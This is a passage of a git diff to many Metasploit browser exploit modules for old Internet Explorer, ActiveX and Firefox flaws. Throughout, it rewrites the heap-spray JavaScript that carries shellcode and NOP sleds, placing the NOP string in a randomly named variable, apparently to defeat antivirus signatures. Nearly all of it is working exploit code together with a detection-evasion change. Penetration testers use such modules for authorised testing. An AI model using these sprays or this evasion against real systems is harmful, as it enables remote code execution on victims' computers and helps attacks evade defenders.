     while (nops.length < 0x80000) nops += nops;
 
@@ -213,10 +215,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
+
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{t['Offset']});
diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
index 672196fcb9..e99d90263b 100644
--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -129,6 +129,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     sploit << [0x41414141].pack("V") # Filler
     sploit << [0x42424242].pack("V") # Filler
@@ -141,7 +143,8 @@ class MetasploitModule < Msf::Exploit::Remote
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x2000) nops += nops;
     var offset = nops.substring(0, 0x800-0x20);
diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
index f88eec2b21..0ba4e7343a 100644
--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -114,6 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -143,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -162,7 +164,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
index 32cf77a81d..52de9e05e1 100644
--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -119,6 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -148,7 +149,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -167,7 +169,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb
index 8abf50c0b7..8d9475a525 100644
--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -123,12 +123,16 @@ class MetasploitModule < Msf::Exploit::Remote
     obj_name  = rand_text_alpha(rand(100) + 1)
     main_sym  = 'main' #main function name
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
 
       js = <<-EOS
       function heapspray(){
         shellcode = unescape('#{sc}');
-        bigblock = unescape("%u0c0c%u0c0c");
+        #{randnop} = "#{js_nops};
+        bigblock = unescape(#{randnop});
         headersize = 20;
         slackspace = headersize+shellcode.length;
         while (bigblock.length<slackspace){ bigblock+=bigblock; }
diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb
index 04f1329b5c..563402b93e 100644
--- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb
+++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb
@@ -74,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content =
@@ -81,7 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
       "<object classid='clsid:DEF37997-D9C9-4A4B-BF3C-88F99EACEEC2' id='#{vname}'></object>\n" +
       "<script language='javascript'>\n" +
       "#{rand1} = unescape('#{shellcode}');\n" +
-      "#{rand2} = unescape('#{nops}');\n" +
+      "#{randnop} = '#{nops}';\n" +
+      "#{rand2} = unescape(#{randnop});\n" +
       "#{rand3} = 20;\n" +
       "#{rand4} = #{rand3}+#{rand1}.length\n" +
       "while (#{rand2}.length<#{rand4}) #{rand2}+=#{rand2};\n" +
diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb
index 9dd79abcbb..5dbd889d13 100644
--- a/modules/exploits/windows/browser/lpviewer_url.rb
+++ b/modules/exploits/windows/browser/lpviewer_url.rb
@@ -84,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Remote
     try {
       var #{vname} = new ActiveXObject('LPViewer.LPViewer.1');
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb
index 4c6cfed201..334f2d8d3c 100644
--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -146,6 +146,9 @@ class MetasploitModule < Msf::Exploit::Remote
     js_applet = rand_text_alpha(rand(10) + 5)
     a_trigger = rand_text_alpha(rand(10) + 5)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     if my_target.name =~ /\(JAVA\)/
 
       #mona.py tekniq! + Payload
@@ -199,13 +202,14 @@ class MetasploitModule < Msf::Exploit::Remote
         var nullt    = 0x2/2;
 
         var espoffset  = (7340 /2) - ptrs.length;
-        var esppadding = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var esppadding = unescape(#{randnop});
         while(esppadding.length < espoffset) esppadding += esppadding;
         esppadding = esppadding.substring(0, espoffset);
 
         var payload = unescape("#{js_payload}");
 
-        var tr_padding = unescape("%u0c0c%u0c0c");
+        var tr_padding = unescape(#{randnop});
         while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
 
         var dummy = ptrs + esppadding + payload + tr_padding;
@@ -292,7 +296,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
         var payload = unescape("#{js_payload}");
 
-        var tr_padding = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var tr_padding = unescape(#{randnop});
         while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
 
         var dummy = ptrs + payload + tr_padding;
diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb
index 8b60b6cddc..9315deecc8 100644
--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -92,12 +92,14 @@ class MetasploitModule < Msf::Exploit::Remote
     mytarget   = auto_target(cli, request)
     var_title  = rand_text_alpha(rand(100) + 1)
     func_main  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     heapspray = ::Rex::Exploitation::JSObfu.new %Q|
 function heapspray()
 {
   shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
-  var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
+  var #{randnop} = "#{Rex::Text.to_unescape(make_nops(4))}";
+  var bigblock = unescape(#{randnop});
   var headersize = 20;
   var slackspace = headersize + shellcode.length;
   while (bigblock.length < slackspace) bigblock += bigblock;
diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
index a2f3bf5b41..c95f4e3cd6 100644
--- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb
+++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
@@ -91,13 +91,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rnd              = rand(2)
     var_setTimeout   = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
     var_setInterval  = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
+    randnop          = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <head>
 <script language = "javascript">
 var #{var_payload} = unescape("#{shellcode}");
-var #{var_nopslide} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{var_nopslide} = unescape(#{randnop});
 var #{var_slidesize} = 20+#{var_payload}.length;
 while (#{var_nopslide}.length<#{var_slidesize}) { #{var_nopslide} += #{var_nopslide}; }
 var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize});
diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
index e069312a05..da6ebe7533 100644
--- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
+++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
@@ -77,13 +77,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
     <html>
       <object id='#{vname}' classid='clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C'></object>
       <script language="JavaScript">
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
index bddfbd2985..eaf13613b7 100644
--- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
+++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
@@ -83,6 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10  = rand_text_alpha(rand(100) + 1)
     rand11  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
 <html>
@@ -93,7 +94,8 @@ class MetasploitModule < Msf::Exploit::Remote
   for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");}
   var #{rand4} = unescape("#{shellcode}");
   var #{rand5} = (#{rand4}.length * 2);
-  var #{rand6} = unescape("#{nops}");
+  var #{randnop} = "#{nops}";
+  var #{rand6} = unescape(#{randnop});
   var #{rand7} = 0x0c0c0c0c;
   var #{rand8} = 0x100000;
   var #{rand9} = #{rand8} - (#{rand5} + 1);
diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb
index c8c48f817f..4d2a728dbf 100644
--- a/modules/exploits/windows/browser/ms10_002_ie_object.rb
+++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb
@@ -120,6 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     p = get_payload(my_target)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # The exploit will try to take up the freed memory
     # with a fake item before the reuse
@@ -198,7 +199,8 @@ function Start() {
 
   var code = unescape("#{js_code}");
   var memory_layout = unescape("#{memory_layout_js}")
-  var nops = unescape("#{js_nops}");
+  var #{randnop} = "#{js_nops}";
+  var nops = unescape(#{randnop});
   while (nops.length < 0x80000) nops += nops;
   var offset = nops.substring(0, #{my_target['Offset']} - memory_layout.length);
   var shellcode = memory_layout + offset + code + nops.substring(0, 0x800-#{my_target['Offset']}-code.length);
diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
index 0f34910091..10d46d6dfe 100644
--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -191,6 +191,9 @@ class MetasploitModule < Msf::Exploit::Remote
     code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
     vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+
     #Extract string based on what the setup is
     if mytarget.name == 'Internet Explorer 8 on XP SP3'
       js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
@@ -216,7 +219,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     function heap_spray(heaplib_obj, offset) {
       var code = unescape("#{code_js}");
-      var nops = unescape("%u0c0c%u0c0c");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
 
       while (nops.length < 0x1000) nops += nops;
       offset = nops.substring(0, #{mytarget['Offset']});
diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb
index d586d70a7b..1a4f9b6869 100644
--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -96,11 +96,14 @@ class MetasploitModule < Msf::Exploit::Remote
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
 
+    randnop = rand_text_alpha(rand(100) + 1)
+
     js = %Q|
     function heap_spray() {
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb
index ef1ce9be3a..0dd645d1d6 100644
--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -120,11 +120,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb
index aeec079e32..44e758bbd5 100644
--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -338,6 +338,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     shellcode = Rex::Text.to_unescape(code)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     # 1. Create  big block of nops
     # 2. Compose one block which is nops + shellcode
     # 3. Repeat the block
@@ -347,7 +350,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{shellcode}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops+= nops;
     var shellcode =  nops.substring(0,0x800 - code.length) + code;
diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb
index 0337038777..7d3bb62a17 100644
--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -160,13 +160,15 @@ class MetasploitModule < Msf::Exploit::Remote
     js_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch))
     js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
     var rop_chain = unescape("#{js_rop}");
     var random = unescape("#{js_padding}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (random.length < 0x80000) random += random;
     while (nops.length < 0x80000) nops += nops;
diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
index 9c77492bbe..0f4b41347b 100644
--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -86,12 +86,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
 
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
index 996eb7279a..b81a458045 100644
--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -104,13 +104,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 8
     js = %Q|
 var heap_obj = new heapLib.ie(0x20000);
 var code = unescape("#{js_code}");
-var nops = unescape("#{js_nops}");
+var #{randnop} = "#{js_nops}";
+var nops = unescape(#{randnop});
 while (nops.length < 0x80000) nops += nops;
 var offset = nops.substring(0, #{my_target['Offset']});
 var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
index 026d3974fa..6ec1835950 100644
--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -196,11 +196,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -224,13 +226,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -288,7 +294,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     var rop = unescape("#{js_rop}");
     var code = unescape("#{js_code}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
 
     while (nops_90.length < 0x80000) nops_90 += nops_90;
 
diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
index 89cd43958b..c1bead16b1 100644
--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -114,6 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -143,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -162,7 +164,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb
index 042abf46a7..a7a4b3ae94 100644
--- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb
+++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb
@@ -112,11 +112,13 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb
index 8cfc00ade1..c0aa199aea 100644
--- a/modules/exploits/windows/browser/novelliprint_executerequest.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb
@@ -76,13 +76,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
       <html>
       <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
       <script language="JavaScript">
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
index 20a29ec374..2d7a684d59 100644
--- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
@@ -111,15 +111,17 @@ class MetasploitModule < Msf::Exploit::Remote
     j_fillblock  = rand_text_alpha(rand(100) + 1)
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
-    j_op	     = rand_text_alpha(rand(100) + 1)
-    j_dbg	     = rand_text_alpha(rand(100) + 1)
+    j_op	 = rand_text_alpha(rand(100) + 1)
+    j_dbg	 = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <object classid='clsid:#{clsid}' id='#{ienipp}'></object>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
index c784347f9d..a418510efe 100644
--- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
@@ -79,12 +79,14 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|<html>
 <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
 <script language="JavaScript">
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
index 6badf5ec16..49779b37c7 100644
